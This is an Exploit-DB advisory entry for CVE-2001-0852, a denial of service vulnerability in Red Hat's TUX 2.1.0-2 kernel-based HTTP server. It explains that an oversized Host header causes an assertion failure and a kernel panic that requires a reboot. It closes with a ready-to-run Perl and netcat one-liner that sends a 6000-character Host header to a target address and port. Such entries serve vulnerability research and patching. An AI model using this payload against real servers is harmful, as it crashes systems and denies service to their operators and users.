Red Hat TUX 2.1.0-2 - HTTP Server Oversized Host Denial of Service Vulnerability

ID EDB-ID:21141
Type exploitdb
Reporter Aiden ORawe
Modified 2001-11-05T00:00:00


Red Hat TUX 2.1 .0-2 HTTP Server Oversized Host Denial of Service Vulnerability. CVE-2001-0852 . Dos exploit for linux platform


TUX is a kernel based HTTP server released under the GNU General Public License. It is able to serve static content, cache dynamic content, and coordinate with other HTTP servers to produce dynamic content.

An error exists when the TUX daemon received an oversized Host: header as part of a HTTP request. The request will result in an assertation failure and eventually in a kernel panic. At this point a system reboot will be required to regain normal functionality. 

perl -e "print qq(GET / HTTP/1.0\nAccept: */*\nHost: ) . qq(A) x 6000 .
qq(\n)" |nc <ip address> <dest_port>